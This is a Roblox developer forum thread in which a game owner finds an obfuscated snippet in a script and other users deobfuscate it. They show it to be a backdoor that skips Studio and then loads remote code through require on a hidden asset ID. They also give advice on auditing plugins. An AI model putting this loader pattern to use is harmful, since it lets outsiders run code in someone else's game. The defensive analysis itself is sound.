My game script got edited by another dev

So I haven’t checked my game in a while, and I decided to join the studio to make an update and i looked in one of the scripts and I see this:

local coro = coroutine.create(ibFhs = 'Workspace' ioO1Ju = game isAKIa8Ij = 'test' iCBrOqfBhY96 = require i15np9 = 'Debris' irFwdlLU = spawn iPa3wWOs = 'GetService' iofpThquabaP8 = 'PlaceId' iUbtEO6xALZ = math.sqrt iGrU = 71758291.702703 * 37 i7MQQJ4BShx = 'RunService' i1iGZPLJzwG = 'IsStudio' iGps773kV0n = 'MarketplaceService' ivf26e1a8K = 'RunService' iTKUIea9W2S = pcall iuanRXZNNPXGsD3 = pcall iZ39cDvYfak = 'ClassName' iNnQ240LZ = 'load'  irFwdlLU(       function()        iuanRXZNNPXGsD3(       function()        if ioO1Ju:GetService(ivf26e1a8K)       [i1iGZPLJzwG]       (ioO1Ju:GetService(ivf26e1a8K)       ) then         return        end iCBrOqfBhY96(iGrU)       [iNnQ240LZ]       (ioO1Ju[iofpThquabaP8]       )        end       )        end       )
function()

Do any of you know what this is? Maybe a plugin did it? I really hope one of my devs didn’t post this in the game, because It would be very sad.

2 Likes

Spaced up a little bit so you can understand that it is indeed a backdoor
Here’s why :

  • The code is made very confusing on purpose
  • you have “require” and a “id”, means it is most likely a module loading up
  • for some reason, it also opens up MarketplaceService, which means he could sell any gamepasses into your game UNLESS you have this disabled (Workspace’s properties) image

i’ve never seen anything like that before lol

local coro = coroutine.create(ibFhs = 'Workspace'
ioO1Ju = game
isAKIa8Ij = 'test'
iCBrOqfBhY96 = require 
i15np9 = 'Debris' 
irFwdlLU = spawn 
iPa3wWOs = 'GetService'
 iofpThquabaP8 = 'PlaceId' 
iUbtEO6xALZ = math.sqrt 
iGrU = 71758291.702703 * 37
 i7MQQJ4BShx = 'RunService'
 i1iGZPLJzwG = 'IsStudio'
 iGps773kV0n = 'MarketplaceService' 
ivf26e1a8K = 'RunService' 
iTKUIea9W2S = pcall 
iuanRXZNNPXGsD3 = pcall
 iZ39cDvYfak = 'ClassName' 
iNnQ240LZ = 'load' 
 irFwdlLU(function()iuanRXZNNPXGsD3(function()
if ioO1Ju:GetService(ivf26e1a8K)[i1iGZPLJzwG](ioO1Ju:GetService(ivf26e1a8K)) then
return
end
iCBrOqfBhY96(iGrU)[iNnQ240LZ](ioO1Ju[iofpThquabaP8])
end)
end)
function()```

Do you think a plugin edited my scripts, or a dev of the team did?

Both options are possible, to find out, please link all the plugins you currently possess.

I have no plugins, but I can check the other devs plugins and see if any of them look fishy. Thanks for your help!

iCBrOqfBhY96(iGrU)[iNnQ240LZ](ioO1Ju[iofpThquabaP8])

means

require(2655056793)[load](game[PlaceId])

it leads to a “March 22 2019” Deleted asset, it’s probably safe to assume it’s a plugin
https://www.roblox.com/library/2655056793/Content-Deleted
As a prevention to any backdoor, all you need to do is check codes that includes something such as require(id)

I recommend not having devs do it in the actual game to prevent backdoors i always have my devs do it in another baseplate…

please close thread.

You shouldn’t be letting developers you don’t trust as much to your game as stated above, but also it might not end well if you accuse any of them for this and that might end up false. I’d suggest reviewing the sources and see if it’s a plugin.

That doesn’t prevent backdoors at all. You’re just changing the place in which you’re working at. Simple solution is just to check what you’re installing and verify its creator rather than taking it without a second thought behind it.

1 Like

I think the idea is that if they do their work in another place, you can kind of scan through it while you’re moving it over. As well, the main game is usually much larger and thus easier to hide a backdoor script in.

1 Like

When the additional developers are only building, it makes this a lot of sense to have that happening in a separate team create place from where the scripting is being done.

Free models and rogue plugins can both still be sources of backdoors. Plugins have access to more of the datamodel, and can execute code that affects your place file outside of Play runtime, so they are more dangerous overall and can hide things in your place. You have to carefully inspect every plugin you install and be very pro-active in protecting your main place file against remote developers whose plugin situations you cannot control.

1 Like

How did you turn that random jumble of letters into an ID?

iGrU = 71758291.702703 * 37

if you do the maths, it indirectly gives 2655056793, which means the math result is the one loading,
it’s technically not converting letters into numbers,
but iGrU defined numbers, so logically, the id.

How did you find out what iGrU is?

in the first post, you just see that iGrU is equal to numbers

Then you look via web with https://www.roblox.com/library/ID/Model